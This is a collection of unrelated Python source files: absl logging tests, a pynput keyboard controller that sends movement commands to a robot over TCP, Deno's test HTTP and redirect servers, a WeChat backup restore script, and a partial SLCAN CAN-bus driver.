# The function doesn't exist, but our test code still tries to mock
# it, so just use a fake thing.
mock_getuid = _mock_windows_os_getuid()
uid = -1
logged_uid = 'unknown'
host = 'test_host'
log_dir = 'here'
program_name = 'prog1'
with mock.patch.object(getpass, 'getuser'), \
mock_getuid as getuid, \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname') as mock_gethostname:
getpass.getuser.side_effect = KeyError()
getuid.return_value = uid
mock_gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (program_name, host, logged_uid)
self.assertEqual((log_dir, prefix, program_name),
logging.find_log_dir_and_names(
program_name=program_name, log_dir=log_dir))
def test_errors_in_logging(self):
with mock.patch.object(sys, 'stderr', new=_StreamIO()) as stderr:
logging.info('not enough args: %s %s', 'foo') # pylint: disable=logging-too-few-args
self.assertIn('Traceback (most recent call last):', stderr.getvalue())
self.assertIn('TypeError', stderr.getvalue())
def test_dict_arg(self):
# Tests that passing a dictionary as a single argument does not crash.
logging.info('%(test)s', {'test': 'Hello world!'})
def test_exception_dict_format(self):
# Just verify that this doesn't raise a TypeError.
logging.exception('%(test)s', {'test': 'Hello world!'})
def test_logging_levels(self):
old_level = logging.get_verbosity()
logging.set_verbosity(logging.DEBUG)
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
self.assertTrue(logging.level_debug())
self.assertTrue(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.INFO)
self.assertEquals(logging.get_verbosity(), logging.INFO)
self.assertFalse(logging.level_debug())
self.assertTrue(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.WARNING)
self.assertEquals(logging.get_verbosity(), logging.WARNING)
self.assertFalse(logging.level_debug())
self.assertFalse(logging.level_info())
self.assertTrue(logging.level_warning())
self.assertTrue(logging.level_error())
logging.set_verbosity(logging.ERROR)
self.assertEquals(logging.get_verbosity(), logging.ERROR)
self.assertFalse(logging.level_debug())
self.assertFalse(logging.level_info())
self.assertTrue(logging.level_error())
logging.set_verbosity(old_level)
def test_set_verbosity_strings(self):
old_level = logging.get_verbosity()
# Lowercase names.
logging.set_verbosity('debug')
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity('info')
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity('warning')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('warn')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('error')
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity('fatal')
# Uppercase names.
self.assertEquals(logging.get_verbosity(), logging.FATAL)
logging.set_verbosity('DEBUG')
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity('INFO')
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity('WARNING')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('WARN')
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity('ERROR')
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity('FATAL')
self.assertEquals(logging.get_verbosity(), logging.FATAL)
# Integers as strings.
logging.set_verbosity(str(logging.DEBUG))
self.assertEquals(logging.get_verbosity(), logging.DEBUG)
logging.set_verbosity(str(logging.INFO))
self.assertEquals(logging.get_verbosity(), logging.INFO)
logging.set_verbosity(str(logging.WARNING))
self.assertEquals(logging.get_verbosity(), logging.WARNING)
logging.set_verbosity(str(logging.ERROR))
self.assertEquals(logging.get_verbosity(), logging.ERROR)
logging.set_verbosity(str(logging.FATAL))
self.assertEquals(logging.get_verbosity(), logging.FATAL)
logging.set_verbosity(old_level)
def test_key_flags(self):
key_flags = FLAGS.get_key_flags_for_module(logging)
key_flag_names = [flag.name for flag in key_flags]
self.assertIn('stderrthreshold', key_flag_names)
self.assertIn('verbosity', key_flag_names)
def test_get_absl_logger(self):
self.assertIsInstance(
logging.get_absl_logger(), logging.ABSLLogger)
def test_get_absl_handler(self):
self.assertIsInstance(
logging.get_absl_handler(), logging.ABSLHandler)
@mock.patch.object(logging.ABSLLogger, 'register_frame_to_skip')
class LogSkipPrefixTest(absltest.TestCase):
"""Tests for logging.skip_log_prefix."""
def _log_some_info(self):
"""Logging helper function for LogSkipPrefixTest."""
logging.info('info')
def _log_nested_outer(self):
"""Nested logging helper functions for LogSkipPrefixTest."""
def _log_nested_inner():
logging.info('info nested')
return _log_nested_inner
def test_skip_log_prefix_with_name(self, mock_skip_register):
retval = logging.skip_log_prefix('_log_some_info')
mock_skip_register.assert_called_once_with(__file__, '_log_some_info', None)
self.assertEqual(retval, '_log_some_info')
def test_skip_log_prefix_with_func(self, mock_skip_register):
retval = logging.skip_log_prefix(self._log_some_info)
mock_skip_register.assert_called_once_with(
__file__, '_log_some_info', mock.ANY)
self.assertEqual(retval, self._log_some_info)
def test_skip_log_prefix_with_functools_partial(self, mock_skip_register):
partial_input = functools.partial(self._log_some_info)
with self.assertRaises(ValueError):
_ = logging.skip_log_prefix(partial_input)
mock_skip_register.assert_not_called()
def test_skip_log_prefix_with_lambda(self, mock_skip_register):
lambda_input = lambda _: self._log_some_info()
retval = logging.skip_log_prefix(lambda_input)
mock_skip_register.assert_called_once_with(__file__, '<lambda>', mock.ANY)
self.assertEqual(retval, lambda_input)
def test_skip_log_prefix_with_bad_input(self, mock_skip_register):
dict_input = {1: 2, 2: 3}
with self.assertRaises(TypeError):
_ = logging.skip_log_prefix(dict_input)
mock_skip_register.assert_not_called()
def test_skip_log_prefix_with_nested_func(self, mock_skip_register):
nested_input = self._log_nested_outer()
retval = logging.skip_log_prefix(nested_input)
mock_skip_register.assert_called_once_with(
__file__, '_log_nested_inner', mock.ANY)
self.assertEqual(retval, nested_input)
def test_skip_log_prefix_decorator(self, mock_skip_register):
@logging.skip_log_prefix
def _log_decorated():
logging.info('decorated')
del _log_decorated
mock_skip_register.assert_called_once_with(
__file__, '_log_decorated', mock.ANY)
@contextlib.contextmanager
def override_python_handler_stream(stream):
handler = logging.get_absl_handler().python_handler
old_stream = handler.stream
handler.stream = stream
try:
yield
finally:
handler.stream = old_stream
class GetLogFileNameTest(parameterized.TestCase):
@parameterized.named_parameters(
('err', sys.stderr),
('out', sys.stdout),
)
def test_get_log_file_name_py_std(self, stream):
with override_python_handler_stream(stream):
self.assertEqual('', logging.get_log_file_name())
def test_get_log_file_name_py_no_name(self):
class FakeFile(object):
pass
with override_python_handler_stream(FakeFile()):
self.assertEqual('', logging.get_log_file_name())
def test_get_log_file_name_py_file(self):
_, filename = tempfile.mkstemp(dir=FLAGS.test_tmpdir)
with open(filename, 'a') as stream:
with override_python_handler_stream(stream):
self.assertEqual(filename, logging.get_log_file_name())
@contextlib.contextmanager
def _mock_windows_os_getuid():
yield mock.MagicMock()
if __name__ == '__main__':
absltest.main()
|
pc_keyboard-check.py
|
#!/usr/bin/python3.7
#encoding:utf-8
import pynput
import threading
from socket import *
address="192.168.31.106" #8266的服务器的ip地址
port=8266 #8266的服务器的端口号
buffsize=1024 #接收数据的缓存大小
s=socket(AF_INET, SOCK_STREAM)
s.connect((address,port))
def fun():
while True:
recvdata=s.recv(buffsize).decode('utf-8')
print("\n接收的数据是:"+recvdata)
#for i in recvdata:
# if(i is not 0):
# print('%#x' % ord(i))
t = threading.Thread(target=fun)  # new thread dedicated to receiving data sent from the server
t.start()
#while True:
# senddata=input('\nData to send: ')
# if senddata=='exit':
# break
# s.send(senddata.encode())
# #recvdata=s.recv(buffsize).decode('utf-8')
# #print(recvdata)
#s.close()
"""此模块用来做上位机,把电脑当作遥控器来对机器人进行控制
"""
keyboard = pynput.keyboard.Controller()
#TCP = Tcp_server()
#Clientsock, Clientaddress = TCP.wait_connect()
#thread = threading.Thread(target=TCP.reve_massage,
# args=(Clientsock, Clientaddress)) # t为新创建的线程
#thread.start()
"""把获取的键盘值显示出来"""
def on_press(key):
try:
print("key {} pressed".format(key.char))#输入类似abcd的值可以直接传换成字符串打印出来
if key.char is 's':
print("向后")
senddata = '2'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('a4a4')
#TCP.send_massage("a4a4", Clientsock, Clientaddress)
elif key.char is 'w':
print("向前")
senddata = '1'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('g8g8')
#TCP.send_massage("g8g8", Clientsock, Clientaddress)
elif key.char is 'd':
print("向左")
senddata = '4'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('g7a4')
#TCP.send_massage("g7a4", Clientsock, Clientaddress)
elif key.char is 'a':
print("向右")
senddata = '3'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('a4g7')
#TCP.send_massage("a4g7", Clientsock, Clientaddress)
elif key.char is 'q':
print("撒车")
senddata = '5'
s.send(senddata.encode())
elif key.char is 'i':
print("左转头")
senddata = '7'
s.send(senddata.encode())
elif key.char is 'k':
print("右转头")
senddata = '6'
s.send(senddata.encode())
elif key.char is 'h':
print("左转头")
senddata = '9'
s.send(senddata.encode())
elif key.char is 'u':
print("右转头")
senddata = '8'
s.send(senddata.encode())
elif key.char is 'j':
print("左转头")
senddata = 'a'
s.send(senddata.encode())
elif key.char is 'l':
print("右转头")
senddata = 'b'
s.send(senddata.encode())
elif key.char is ',':
print("左转头")
senddata = 'c'
s.send(senddata.encode())
elif key.char is '.':
print("右转头")
senddata = 'd'
s.send(senddata.encode())
elif key.char is 'z':
print("测距")
senddata = 'e'
s.send(senddata.encode())
elif key.char is 'x':
print("测距")
senddata = 'f'
s.send(senddata.encode())
except AttributeError:
print("special key {} pressed".format(key))#打印出来类似空格shift这样的功能按键
"""键盘抬起检测"""
def on_release(key):
try:
print("{} released".format(key))
#TCP.send_massage("a0a0", Clientsock, Clientaddress)
except AttributeError:
print("special key {} pressed".format(key))#打印出来类似空格shift这样的功能按键
# 键盘添加监听器
with pynput.keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
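# A table-driven alternative (not part of the original script) to the if/elif chain in
# on_press above: each key maps to a (label, single-character command) pair, so adding a
# new control only means adding one entry. KEY_COMMANDS and handle_key are hypothetical
# names introduced here for illustration only; they reuse the module-level socket s.
KEY_COMMANDS = {
    's': ('backward', '2'),
    'w': ('forward', '1'),
    'd': ('turn left', '4'),
    'a': ('turn right', '3'),
    'q': ('brake', '5'),
    'i': ('turn head left', '7'),
    'k': ('turn head right', '6'),
    'z': ('measure distance', 'e'),
    'x': ('measure distance', 'f'),
}

def handle_key(key):
    """Look up the pressed key and send the mapped command over the existing socket."""
    try:
        label, command = KEY_COMMANDS[key.char]
    except (AttributeError, KeyError):
        return  # special keys (no .char attribute) and unmapped keys are ignored
    print(label)
    s.send(command.encode())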
|
http_server.py
|
#!/usr/bin/env python
# Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 serving the deno
# root directory.
from collections import namedtuple
from contextlib import contextmanager
import os
import SimpleHTTPServer
import SocketServer
import socket
import sys
from time import sleep
from threading import Thread
from util import root_path
PORT = 4545
REDIRECT_PORT = 4546
ANOTHER_REDIRECT_PORT = 4547
DOUBLE_REDIRECTS_PORT = 4548
INF_REDIRECTS_PORT = 4549
QUIET = '-v' not in sys.argv and '--verbose' not in sys.argv
class QuietSimpleHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_request(self, code='-', size='-'):
if not QUIET:
SimpleHTTPServer.SimpleHTTPRequestHandler.log_request(
self, code, size)
class ContentTypeHandler(QuietSimpleHTTPRequestHandler):
def do_GET(self):
if "multipart_form_data.txt" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
self.send_header('Content-type',
'multipart/form-data;boundary=boundary')
self.end_headers()
self.wfile.write(
bytes('Preamble\r\n'
'--boundary\t \r\n'
'Content-Disposition: form-data; name="field_1"\r\n'
'\r\n'
'value_1 \r\n'
'\r\n--boundary\r\n'
'Content-Disposition: form-data; name="field_2"; '
'filename="file.js"\r\n'
'Content-Type: text/javascript\r\n'
'\r\n'
'console.log("Hi")'
'\r\n--boundary--\r\n'
'Epilogue'))
return
return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
# Simple echo server for request reflection
if "echo_server" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
if self.headers.has_key('content-type'):
self.send_header('content-type',
self.headers.getheader('content-type'))
if self.headers.has_key('user-agent'):
self.send_header('user-agent',
self.headers.getheader('user-agent'))
self.end_headers()
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.wfile.write(bytes(data_string))
return
self.protocol_version = 'HTTP/1.1'
self.send_response(501)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('Server does not support this operation'))
def guess_type(self, path):
if ".t1." in path:
return "text/typescript"
if ".t2." in path:
return "video/vnd.dlna.mpeg-tts"
if ".t3." in path:
return "video/mp2t"
if ".t4." in path:
return "application/x-typescript"
if ".j1." in path:
return "text/javascript"
if ".j2." in path:
return "application/ecmascript"
if ".j3." in path:
return "text/ecmascript"
if ".j4." in path:
return "application/x-javascript"
if "form_urlencoded" in path:
return "application/x-www-form-urlencoded"
if "no_ext" in path:
return "text/typescript"
if "unknown_ext" in path:
return "text/typescript"
if "mismatch_ext" in path:
return "text/javascript"
return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path)
RunningServer = namedtuple("RunningServer", ["server", "thread"])
def get_socket(port, handler):
SocketServer.TCPServer.allow_reuse_address = True
if os.name != "nt":
# We use AF_INET6 to avoid flaky test issue, particularly with
# the test 019_media_types. It's not well understood why this fixes the
# flaky tests, but it does appear to...
# See https://github.com/denoland/deno/issues/3332
SocketServer.TCPServer.address_family = socket.AF_INET6
return SocketServer.TCPServer(("", port), handler)
def server():
os.chdir(root_path) # Hopefully the main thread doesn't also chdir.
Handler = ContentTypeHandler
Handler.extensions_map.update({
".ts": "application/typescript",
".js": "application/javascript",
".tsx": "application/typescript",
".jsx": "application/javascript",
".json": "application/json",
})
s = get_socket(PORT, Handler)
if not QUIET:
print "Deno test server http://localhost:%d/" % PORT
return RunningServer(s, start(s))
def base_redirect_server(host_port, target_port, extra_path_segment=""):
os.chdir(root_path)
target_host = "http://localhost:%d" % target_port
class RedirectHandler(QuietSimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location',
target_host + extra_path_segment + self.path)
self.end_headers()
s = get_socket(host_port, RedirectHandler)
if not QUIET:
print "redirect server http://localhost:%d/ -> http://localhost:%d/" % (
host_port, target_port)
return RunningServer(s, start(s))
# redirect server
def redirect_server():
return base_redirect_server(REDIRECT_PORT, PORT)
# another redirect server pointing to the same port as the one above
# BUT with an extra subdir path
def another_redirect_server():
return base_redirect_server(
ANOTHER_REDIRECT_PORT, PORT, extra_path_segment="/tests/subdir")
# redirect server that points to another redirect server
def double_redirects_server():
return base_redirect_server(DOUBLE_REDIRECTS_PORT, REDIRECT_PORT)
# redirect server that points to itself
def inf_redirects_server():
return base_redirect_server(INF_REDIRECTS_PORT, INF_REDIRECTS_PORT)
def start(s):
thread = Thread(target=s.serve_forever, kwargs={"poll_interval": 0.05})
thread.daemon = True
thread.start()
return thread
@contextmanager
def spawn():
servers = (server(), redirect_server(), another_redirect_server(),
double_redirects_server())
while any(not s.thread.is_alive() for s in servers):
sleep(0.01)
try:
print "ready"
yield servers
finally:
for s in servers:
s.server.shutdown()
def main():
with spawn() as servers:
try:
while all(s.thread.is_alive() for s in servers):
sleep(1)
except KeyboardInterrupt:
pass
sys.exit(1)
if __name__ == '__main__':
main()
|
restore_wechat_backup.py
|
#!/usr/bin/python -u
"""
Copyright 2017, Jacksgong(https://blog.dreamtobe.cn)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Script to restore wechat backup on mac.
from os.path import exists
from shutil import copytree
from threading import Thread
from wechat_backup_utils import select_conf_file, colorize, RED, GREEN, show_spinner
src, dst, conf_path = select_conf_file()
if src is None or dst is None:
exit(colorize("we can't find source directory or target directory on " + conf_path, fg=RED))
if exists(src):
exit(colorize(
"the src directory['" + src + "']is exist, if you want to restore, please remove the src directory first",
fg=RED))
if not exists(dst):
exit(colorize("we can't find backup files on " + dst, fg=RED))
print colorize("start restore " + dst + " to " + src, fg=GREEN)
thread = Thread(target=copytree, args=[dst, src])
thread.start()
show_spinner(thread)
print 'everything is done!'
|
slcan.py
|
#
# Copyright (C) 2014-2016 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: Ben Dyer <ben_dyer@mac.com>
# Pavel Kirienko <pavel.kirienko@zubax.com>
#
from __future__ import division, absolute_import, print_function, unicode_literals
import os
import sys
import time
import inspect
import binascii
import select
import multiprocessing
import threading
import copy
from logging import getLogger
from .common import DriverError, TxQueueFullError, CANFrame, AbstractDriver
from .timestamp_estimator import TimestampEstimator
try:
import queue
except ImportError:
# noinspection PyPep8Naming,PyUnresolvedReferences
import Queue as queue
logger = getLogger(__name__)
# If PySerial isn't available, we can't support SLCAN
try:
import serial
except ImportError:
serial = None
logger.info("Cannot import PySerial; SLCAN will not be available.")
try:
# noinspection PyUnresolvedReferences
sys.getwindowsversion()
RUNNING_ON_WINDOWS = True
except AttributeError:
RUNNING_ON_WINDOWS = False
#
# Constants and defaults
#
if 'darwin' in sys.platform:
RX_QUEUE_SIZE = 32767 # http://stackoverflow.com/questions/5900985/multiprocessing-queue-maxsize-limit-is-32767
else:
RX_QUEUE_SIZE = 1000000
TX_QUEUE_SIZE = 1000
TIMESTAMP_OVERFLOW_PERIOD = 60 # Defined by SLCAN protocol
DEFAULT_BITRATE = 1000000
DEFAULT_BAUDRATE = 3000000
ACK_TIMEOUT = 0.5
ACK = b'\r'
NACK = b'\x07'
CLI_END_OF_LINE = b'\r\n'
CLI_END_OF_TEXT = b'\x03'
DEFAULT_MAX_ADAPTER_CLOCK_RATE_ERROR_PPM = 200 # Suits virtually all adapters
DEFAULT_FIXED_RX_DELAY = 0.0002 # Good for USB, could be higher for UART
DEFAULT_MAX_ESTIMATED_RX_DELAY_TO_RESYNC = 0.1 # When clock divergence exceeds this value, resync
IO_PROCESS_INIT_TIMEOUT = 10
IO_PROCESS_NICENESS_INCREMENT = -18
MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP = 1000
#
# IPC entities
#
IPC_SIGNAL_INIT_OK = 'init_ok' # Sent from IO process to the parent process when init is done
IPC_COMMAND_STOP = 'stop' # Sent from parent process to the IO process when it's time to exit
class IPCCommandLineExecutionRequest:
DEFAULT_TIMEOUT = 1
def __init__(self, command, timeout=None):
if isinstance(command, bytes):
command = command.decode('utf8')
self.command = command.lstrip()
self.monotonic_deadline = time.monotonic() + (timeout or self.DEFAULT_TIMEOUT)
@property
def expired(self):
return time.monotonic() >= self.monotonic_deadline
class IPCCommandLineExecutionResponse:
def __init__(self, command, lines=None, expired=False):
def try_decode(what):
if isinstance(what, bytes):
return what.decode('utf8')
return what
self.command = try_decode(command)
self.lines = [try_decode(ln) for ln in (lines or [])]
self.expired = expired
def __str__(self):
if not self.expired:
return '%r %r' % (self.command, self.lines)
else:
return '%r EXPIRED' % self.command
__repr__ = __str__
_pending_command_line_execution_requests = queue.Queue()
#
# Logic of the IO process
#
class RxWorker:
PY2_COMPAT = sys.version_info[0] < 3
SELECT_TIMEOUT = 0.1
READ_BUFFER_SIZE = 1024 * 8 # Arbitrary large number
def __init__(self, conn, rx_queue, ts_estimator_mono, ts_estimator_real, termination_condition):
self._conn = conn
self._output_queue = rx_queue
self._ts_estimator_mono = ts_estimator_mono
self._ts_estimator_real = ts_estimator_real
self._termination_condition = termination_condition
if RUNNING_ON_WINDOWS:
# select() doesn't work on serial ports under Windows, so we have to resort to workarounds. :(
self._conn.timeout = self.SELECT_TIMEOUT
else:
self._conn.timeout = 0
def _read_port(self):
if RUNNING_ON_WINDOWS:
data = self._conn.read(max(1, self._conn.inWaiting()))
# Timestamping as soon as possible after unblocking
ts_mono = time.monotonic()
ts_real = time.time()
else:
select.select([self._conn.fileno()], [], [], self.SELECT_TIMEOUT)
# Timestamping as soon as possible after unblocking
ts_mono = time.monotonic()
ts_real = time.time()
# Read as much data as possible in order to avoid RX overrun
data = self._conn.read(self.READ_BUFFER_SIZE)
return data, ts_mono, ts_real
def _process_slcan_line(self, line, local_ts_mono, local_ts_real):
line = line.strip().strip(NACK).strip(CLI_END_OF_TEXT)
line_len = len(line)
if line_len < 1:
return
# Checking the header, ignore all irrelevant lines
if line[0] == b'T'[0]:
id_len = 8
elif line[0] == b't'[0]:
id_len = 3
else:
return
# Parsing ID and DLC
packet_id = int(line[1:1 + id_len], 16)
if self.PY2_COMPAT:
packet_len = int(line[1 + id_len]) # This version is horribly slow
else:
packet_len = line[1 + id_len] - 48 # Py3 version is faster
if packet_len > 8 or packet_len < 0:
raise DriverError('Invalid packet length')
# Parsing the payload, detecting timestamp
# <type> <id> <dlc> <data> [timestamp]
# 1 3|8 1 packet_len * 2 [4]
with_timestamp = line_len > (2 + id_len + packet_len * 2)
packet_data = binascii.a2b_hex(line[2 + id_len:2 + id_len + packet_len * 2])
# Handling the timestamp, if present
if with_timestamp:
ts_hardware = int(line[-4:], 16) * 1e-3
ts_mono = self._ts_estimator_mono.update(ts_hardware, local_ts_mono)
ts_real = self._ts_estimator_real.update(ts_hardware, local_ts_real)
else:
ts_mono = local_ts_mono
ts_real = local_ts_real
frame = CANFrame(packet_id, packet_data, (id_len == 8), ts_monotonic=ts_mono, ts_real=ts_real)
self._output_queue.put_nowait(frame)
def _process_many_slcan_lines(self, lines, ts_mono, ts_real):
for slc in lines:
# noinspection PyBroadException
try:
self._process_slcan_line(slc, local_ts_mono=ts_mono, local_ts_real=ts_real)
except Exception:
logger.error('Could not process SLCAN line %r', slc, exc_info=True)
# noinspection PyBroadException
def run(self):
logger.info('RX worker started')
successive_errors = 0
data = bytes()
outstanding_command = None
outstanding_command_response_lines = []
while not self._termination_condition():
try:
new_data, ts_mono, ts_real = self._read_port()
data += new_data
# Checking the command queue and handling command timeouts
while True:
if outstanding_command is None:
try:
outstanding_command = _pending_command_line_execution_requests.get_nowait()
outstanding_command_response_lines = []
except queue.Empty:
break
if outstanding_command.expired:
self._output_queue.put(IPCCommandLineExecutionResponse(outstanding_command.command,
expired=True))
outstanding_command = None
else:
break
# Processing in normal mode if there's no outstanding command; using much slower CLI mode otherwise
if outstanding_command is None:
slcan_lines = data.split(ACK)
slcan_lines, data = slcan_lines[:-1], slcan_lines[-1]
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
del slcan_lines
else:
# TODO This branch contains dirty and poorly tested code. Refactor once the protocol matures.
split_lines = data.split(CLI_END_OF_LINE)
split_lines, data = split_lines[:-1], split_lines[-1]
# Processing the mix of SLCAN and CLI lines
for ln in split_lines:
tmp = ln.split(ACK)
slcan_lines, cli_line = tmp[:-1], tmp[-1]
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
# Processing the CLI line
logger.debug('Processing CLI response line %r as...', cli_line)
if len(outstanding_command_response_lines) == 0:
if outstanding_command is not None and \
cli_line == outstanding_command.command.encode('utf8'):
logger.debug('...echo')
outstanding_command_response_lines.append(cli_line)
else:
# Otherwise we're receiving some CLI garbage before or after the command output, e.g.
# end of the previous command output if it was missed
logger.debug('...garbage')
else:
if cli_line == CLI_END_OF_TEXT:
logger.debug('...end-of-text')
# Shipping
response = IPCCommandLineExecutionResponse(outstanding_command.command,
lines=outstanding_command_response_lines[1:])
self._output_queue.put(response)
# Immediately fetching the next command, expiration is not checked
try:
outstanding_command = _pending_command_line_execution_requests.get_nowait()
except queue.Empty:
outstanding_command = None
outstanding_command_response_lines = []
else:
logger.debug('...mid response')
outstanding_command_response_lines.append(cli_line)
del split_lines
# The remainder may contain SLCAN and CLI lines as well;
# there is no reason not to process SLCAN ones immediately.
# The last byte could be beginning of an \r\n sequence, so it's excluded from parsing.
data, last_byte = data[:-1], data[-1:]
slcan_lines = data.split(ACK)
slcan_lines, data = slcan_lines[:-1], slcan_lines[-1] + last_byte
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
successive_errors = 0
except Exception as ex:
# TODO: handle the case when the port is closed
logger.error('RX thread error %d of %d',
successive_errors, MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP, exc_info=True)
try:
self._output_queue.put_nowait(ex)
except Exception:
pass
successive_errors += 1
if successive_errors >= MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP:
break
logger.info('RX worker is stopping')
class TxWorker:
QUEUE_BLOCK_TIMEOUT = 0.1
def __init__(self, conn, rx_queue, tx_queue, termination_condition):
self._conn = conn
self._rx_queue = rx_queue
self._tx_queue = tx_queue
self._termination_condition = termination_condition
def _send_frame(self, frame):
line = '%s%d%s\r' % (('T%08X' if frame.extended else 't%03X') % frame.id,
len(frame.data),
binascii.b2a_hex(frame.data).decode('ascii'))
self._conn.write(line.encode('ascii'))
self._conn.flush()
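    # Worked example (added annotation, not part of the original): with the format string above,
    # an extended frame with id 0x1FFFFFFF and data b'\x01\x02' is encoded as the ASCII line
    # b'T1FFFFFFF20102\r', and a standard frame with id 0x123 and no data as b't1230\r'.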
def _execute_command(self, command):
logger.info('Executing command line %r', command.command)
# It is extremely important to write into the queue first, in order to make the RX worker expect the response!
_pending_command_line_execution_requests.put(command)
self._conn.write(command.command.encode('ascii') + CLI_END_OF_LINE)
self._conn.flush()
def run(self):
while True:
try:
command = self._tx_queue.get(True, self.QUEUE_BLOCK_TIMEOUT)
if isinstance(command, CANFrame):
self._send_frame(command)
elif isinstance(command, IPCCommandLineExecutionRequest):
self._execute_command(command)
elif command == IPC_COMMAND_STOP:
break
else:
raise DriverError('IO process received unknown IPC command: %r' % command)
except queue.Empty:
# Checking in this handler in order to avoid interference with traffic
if self._termination_condition():
break
except Exception as ex:
logger.error('TX thread exception', exc_info=True)
# Propagating the exception to the parent process
# noinspection PyBroadException
try:
self._rx_queue.put_nowait(ex)
except Exception:
pass
# noinspection PyUnresolvedReferences
def _raise_self_process_priority():
if RUNNING_ON_WINDOWS:
import win32api
import win32process
import win32con
handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, win32api.GetCurrentProcessId())
win32process.SetPriorityClass(handle, win32process.REALTIME_PRIORITY_CLASS)
else:
import os
os.nice(IO_PROCESS_NICENESS_INCREMENT)
def _init_adapter(conn, bitrate):
def wait_for_ack():
logger.info('Init: Waiting for ACK...')
conn.timeout = ACK_TIMEOUT
while True:
b = conn.read(1)
if not b:
raise DriverError('SLCAN ACK timeout')
if b == NACK:
raise DriverError('SLCAN NACK in response')
if b == ACK:
break
logger.info('Init: Ignoring byte %r while waiting for ACK', b)
def send_command(cmd):
logger.info('Init: Sending command %r', cmd)
conn.write(cmd + b'\r')
speed_code = {
1000000: 8,
800000: 7,
500000: 6,
250000: 5,
125000: 4,
100000: 3,
50000: 2,
20000: 1,
10000: 0
}[bitrate if bitrate is not None else DEFAULT_BITRATE]
num_retries = 3
while True:
try:
# Sending an empty command in order to reset the adapter's command parser, then discarding all output
send_command(b'')
try:
wait_for_ack()
except DriverError:
pass
time.sleep(0.1)
conn.flushInput()
# Making sure the channel is closed - some adapters may refuse to re-open if the channel is already open
send_command(b'C')
try:
wait_for_ack()
except DriverError:
pass
# Setting speed code
send_command(('S%d' % speed_code).encode())
conn.flush()
wait_for_ack()
# Opening the channel
send_command(b'O')
conn.flush()
wait_for_ack()
# Clearing error flags
send_command(b'F')
conn.flush()
try:
wait_for_ack()
except DriverError as ex:
logger.warning('Init: Could not clear error flags (command not supported by the CAN adapter?): %s', ex)
except Exception as ex:
if num_retries > 0:
logger.error('Could not init SLCAN adapter, will retry; error was: %s', ex, exc_info=True)
else:
raise ex
num_retries -= 1
else:
break
# Discarding all input again
time.sleep(0.1)
conn.flushInput()
def _stop_adapter(conn):
conn.write(b'C\r' * 10)
conn.flush()
# noinspection PyBroadException
def _io_process(device,
tx_queue,
rx_queue,
log_queue,
parent_pid,
bitrate=None,
baudrate=None,
max_adapter_clock_rate_error_ppm=None,
fixed_rx_delay=None,
max_estimated_rx_delay_to_resync=None):
try:
# noinspection PyUnresolvedReferences
from logging.handlers import QueueHandler
except ImportError:
pass # Python 2.7, no logging for you
else:
getLogger().addHandler(QueueHandler(log_queue))
getLogger().setLevel('INFO')
logger.info('IO process started with PID %r', os.getpid())
# We don't need stdin
try:
stdin_fileno = sys.stdin.fileno()
sys.stdin.close()
os.close(stdin_fileno)
except Exception:
pass
def is_parent_process_alive():
if RUNNING_ON_WINDOWS:
return True # TODO: Find a working solution for Windows (os.kill(ppid, 0) doesn't work)
else:
return os.getppid() == parent_pid
try:
_raise_self_process_priority()
except Exception as ex:
logger.warning('Could not adjust priority of the IO process: %r', ex)
#
# This is needed to convert timestamps from hardware clock to local clocks
#
if max_adapter_clock_rate_error_ppm is None:
max_adapter_clock_rate_error = DEFAULT_MAX_ADAPTER_CLOCK_RATE_ERROR_PPM / 1e6
else:
max_adapter_clock_rate_error = max_adapter_clock_rate_error_ppm / 1e6
fixed_rx_delay = fixed_rx_delay if fixed_rx_delay is not None else DEFAULT_FIXED_RX_DELAY
